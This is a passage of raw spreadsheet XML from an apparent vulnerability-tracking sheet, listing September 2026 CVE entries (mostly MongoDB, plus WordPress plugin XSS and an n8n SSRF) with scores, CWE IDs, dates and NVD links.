          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P867" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q867" s="5" t="inlineStr"/>
      <c r="R867" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S867"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T867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t>
        </is>
      </c>
    </row>
    <row r="868">
      <c r="A868" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B868" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82054</t>
        </is>
      </c>
      <c r="D868" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E868" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F868" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G868" s="5" t="inlineStr"/>
      <c r="H868" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I868" s="5" t="inlineStr"/>
      <c r="J868" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K868" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L868" s="5" t="inlineStr"/>
      <c r="M868" s="5" t="inlineStr"/>
      <c r="N868" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O868" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P868" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q868" s="5" t="inlineStr"/>
      <c r="R868" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S868"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T868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t>
        </is>
      </c>
    </row>
    <row r="869">
      <c r="A869" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B869" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82055</t>
        </is>
      </c>
      <c r="D869" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E869" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F869" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G869" s="5" t="inlineStr"/>
      <c r="H869" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I869" s="5" t="inlineStr"/>
      <c r="J869" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K869" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L869" s="5" t="inlineStr"/>
      <c r="M869" s="5" t="inlineStr"/>
      <c r="N869" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O869" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P869" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q869" s="5" t="inlineStr"/>
      <c r="R869" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S869"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T869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t>
        </is>
      </c>
    </row>
    <row r="870">
      <c r="A870" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B870" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82057</t>
        </is>
      </c>
      <c r="D870" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E870" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F870" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G870" s="5" t="inlineStr"/>
      <c r="H870" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I870" s="5" t="inlineStr"/>
      <c r="J870" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K870" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L870" s="5" t="inlineStr"/>
      <c r="M870" s="5" t="inlineStr"/>
      <c r="N870" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O870" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P870" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q870" s="5" t="inlineStr"/>
      <c r="R870" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S870"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T870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t>
        </is>
      </c>
    </row>
    <row r="871">
      <c r="A871" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B871" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82058</t>
        </is>
      </c>
      <c r="D871" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E871" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F871" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G871" s="5" t="inlineStr"/>
      <c r="H871" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I871" s="5" t="inlineStr"/>
      <c r="J871" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K871" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L871" s="5" t="inlineStr"/>
      <c r="M871" s="5" t="inlineStr"/>
      <c r="N871" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O871" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P871" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q871" s="5" t="inlineStr"/>
      <c r="R871" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S871"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T871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t>
        </is>
      </c>
    </row>
    <row r="872">
      <c r="A872" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B872" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82065</t>
        </is>
      </c>
      <c r="D872" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E872" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F872" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G872" s="5" t="inlineStr"/>
      <c r="H872" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I872" s="5" t="inlineStr"/>
      <c r="J872" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K872" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L872" s="5" t="inlineStr"/>
      <c r="M872" s="5" t="inlineStr"/>
      <c r="N872" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O872" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P872" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q872" s="5" t="inlineStr"/>
      <c r="R872" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S872"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T872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t>
        </is>
      </c>
    </row>
    <row r="873">
      <c r="A873" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B873" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82068</t>
        </is>
      </c>
      <c r="D873" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E873" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F873" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G873" s="5" t="inlineStr"/>
      <c r="H873" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I873" s="5" t="inlineStr"/>
      <c r="J873" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K873" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L873" s="5" t="inlineStr"/>
      <c r="M873" s="5" t="inlineStr"/>
      <c r="N873" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O873" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P873" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q873" s="5" t="inlineStr"/>
      <c r="R873" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S873"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T873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t>
        </is>
      </c>
    </row>
    <row r="874">
      <c r="A874" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B874" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82070</t>
        </is>
      </c>
      <c r="D874" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E874" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F874" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G874" s="5" t="inlineStr"/>
      <c r="H874" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I874" s="5" t="inlineStr"/>
      <c r="J874" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K874" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L874" s="5" t="inlineStr"/>
      <c r="M874" s="5" t="inlineStr"/>
      <c r="N874" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O874" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P874" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q874" s="5" t="inlineStr"/>
      <c r="R874" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S874"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T874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t>
        </is>
      </c>
    </row>
    <row r="875">
      <c r="A875" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B875" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82073</t>
        </is>
      </c>
      <c r="D875" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E875" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F875" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G875" s="5" t="inlineStr"/>
      <c r="H875" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I875" s="5" t="inlineStr"/>
      <c r="J875" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K875" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L875" s="5" t="inlineStr"/>
      <c r="M875" s="5" t="inlineStr"/>
      <c r="N875" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O875" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P875" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q875" s="5" t="inlineStr"/>
      <c r="R875" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S875"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T875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t>
        </is>
      </c>
    </row>
    <row r="876">
      <c r="A876" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B876" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82074</t>
        </is>
      </c>
      <c r="D876" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E876" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F876" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G876" s="5" t="inlineStr"/>
      <c r="H876" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I876" s="5" t="inlineStr"/>
      <c r="J876" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K876" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L876" s="5" t="inlineStr"/>
      <c r="M876" s="5" t="inlineStr"/>
      <c r="N876" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O876" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P876" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q876" s="5" t="inlineStr"/>
      <c r="R876" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S876"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T876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t>
        </is>
      </c>
    </row>
    <row r="877">
      <c r="A877" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B877" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82076</t>
        </is>
      </c>
      <c r="D877" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E877" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F877" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G877" s="5" t="inlineStr"/>
      <c r="H877" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I877" s="5" t="inlineStr"/>
      <c r="J877" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K877" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L877" s="5" t="inlineStr"/>
      <c r="M877" s="5" t="inlineStr"/>
      <c r="N877" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O877" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P877" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q877" s="5" t="inlineStr"/>
      <c r="R877" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S877"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T877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82076</t>
        </is>
      </c>
    </row>
    <row r="878">
      <c r="A878" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B878" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84817</t>
        </is>
      </c>
      <c r="D878" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E878" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F878" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G878" s="5" t="inlineStr"/>
      <c r="H878" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I878" s="5" t="inlineStr"/>
      <c r="J878" s="5" t="inlineStr"/>
      <c r="K878" s="5" t="inlineStr"/>
      <c r="L878" s="5" t="inlineStr"/>
      <c r="M878" s="5" t="inlineStr"/>
      <c r="N878" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O878" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P878" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q878" s="5" t="inlineStr"/>
      <c r="R878" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S878" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in JetFormBuilder &lt;= 3.6.5.1 versions.</t>
        </is>
      </c>
      <c r="T878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84817</t>
        </is>
      </c>
    </row>
    <row r="879">
      <c r="A879" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B879" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84818</t>
        </is>
      </c>
      <c r="D879" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E879" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F879" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G879" s="5" t="inlineStr"/>
      <c r="H879" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I879" s="5" t="inlineStr"/>
      <c r="J879" s="5" t="inlineStr"/>
      <c r="K879" s="5" t="inlineStr"/>
      <c r="L879" s="5" t="inlineStr"/>
      <c r="M879" s="5" t="inlineStr"/>
      <c r="N879" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O879" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P879" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q879" s="5" t="inlineStr"/>
      <c r="R879" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S879" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Open User Map &lt;= 1.4.50 versions.</t>
        </is>
      </c>
      <c r="T879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84818</t>
        </is>
      </c>
    </row>
    <row r="880">
      <c r="A880" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B880" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84820</t>
        </is>
      </c>
      <c r="D880" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E880" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F880" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G880" s="5" t="inlineStr"/>
      <c r="H880" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I880" s="5" t="inlineStr"/>
      <c r="J880" s="5" t="inlineStr"/>
      <c r="K880" s="5" t="inlineStr"/>
      <c r="L880" s="5" t="inlineStr"/>
      <c r="M880" s="5" t="inlineStr"/>
      <c r="N880" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O880" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P880" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q880" s="5" t="inlineStr"/>
      <c r="R880" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S880" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Unlimited Elements For Elementor (Free Widgets, Addons, Templates) &lt;= 2.0.17 versions.</t>
        </is>
      </c>
      <c r="T880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84820</t>
        </is>
      </c>
    </row>
    <row r="881">
      <c r="A881" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B881" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86074</t>
        </is>
      </c>
      <c r="D881" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E881" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F881" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G881" s="5" t="inlineStr"/>
      <c r="H881" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I881" s="5" t="inlineStr"/>
      <c r="J881" s="5" t="inlineStr"/>
      <c r="K881" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L881" s="5" t="inlineStr"/>
      <c r="M881" s="5" t="inlineStr"/>
      <c r="N881" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O881" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P881" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q881" s="5" t="inlineStr"/>
      <c r="R881" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S881"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881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86074</t>
        </is>
      </c>
    </row>
    <row r="882">
      <c r="A882" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B882" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86081</t>
        </is>
      </c>
      <c r="D882" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E882" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F882" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G882" s="5" t="inlineStr"/>
      <c r="H882" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I882" s="5" t="inlineStr"/>
      <c r="J882" s="5" t="inlineStr"/>
      <c r="K882" s="5" t="inlineStr"/>
      <c r="L882" s="5" t="inlineStr"/>
      <c r="M882" s="5" t="inlineStr"/>
      <c r="N882" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O882" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P882" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q882" s="5" t="inlineStr"/>
      <c r="R882" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S882" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86081</t>
        </is>
      </c>
    </row>
    <row r="883">
      <c r="A883" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B883" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86713</t>
        </is>
      </c>
      <c r="D883" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E883" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F883" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G883" s="5" t="inlineStr"/>
      <c r="H883" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I883" s="5" t="inlineStr"/>
      <c r="J883" s="5" t="inlineStr"/>
      <c r="K883" s="5" t="inlineStr"/>
      <c r="L883" s="5" t="inlineStr"/>
      <c r="M883" s="5" t="inlineStr"/>
      <c r="N883" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O883" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P883" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q883" s="5" t="inlineStr"/>
      <c r="R883" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S883" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86713</t>
        </is>
      </c>
    </row>
    <row r="884">
      <c r="A884" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B884" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86718</t>
        </is>
      </c>
      <c r="D884" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E884" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F884" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G884" s="5" t="inlineStr"/>
      <c r="H884" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I884" s="5" t="inlineStr"/>
      <c r="J884" s="5" t="inlineStr"/>
      <c r="K884" s="5" t="inlineStr"/>
      <c r="L884" s="5" t="inlineStr"/>
      <c r="M884" s="5" t="inlineStr"/>
      <c r="N884" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O884" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P884" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q884" s="5" t="inlineStr"/>
      <c r="R884" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S884" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86718</t>
        </is>
      </c>
    </row>
    <row r="885">
      <c r="A885" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B885" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86724</t>
        </is>
      </c>
      <c r="D885" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E885" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F885" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G885" s="5" t="inlineStr"/>
      <c r="H885" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I885" s="5" t="inlineStr"/>
      <c r="J885" s="5" t="inlineStr"/>
      <c r="K885" s="5" t="inlineStr"/>
      <c r="L885" s="5" t="inlineStr"/>
      <c r="M885" s="5" t="inlineStr"/>
      <c r="N885" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O885" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P885" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q885" s="5" t="inlineStr"/>
      <c r="R885" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S885"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T885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86724</t>
        </is>
      </c>
    </row>
    <row r="886">
      <c r="A886" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B886" s="5" t="inlineStr">
